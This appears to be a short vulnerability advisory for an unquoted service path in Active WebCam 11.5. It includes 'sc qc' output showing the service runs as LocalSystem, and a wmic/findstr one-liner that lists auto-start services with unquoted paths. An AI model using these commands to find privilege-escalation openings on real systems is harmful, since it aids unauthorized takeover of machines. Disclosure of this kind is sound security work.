# Exploit Title: Active WebCam 11.5 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io) # Date: 09.09.2021 # Software Link: https://www.techspot.com/downloads/175-active-webcam.html # Vendor Homepage: https://www.pysoft.com/ # Version: 11.5 # Tested on: Windows 10 # Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options # Proof of Concept: C:\Users\death>sc qc ACTIVEWEBCAM [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ACTIVEWEBCAM TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Active WebCam DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto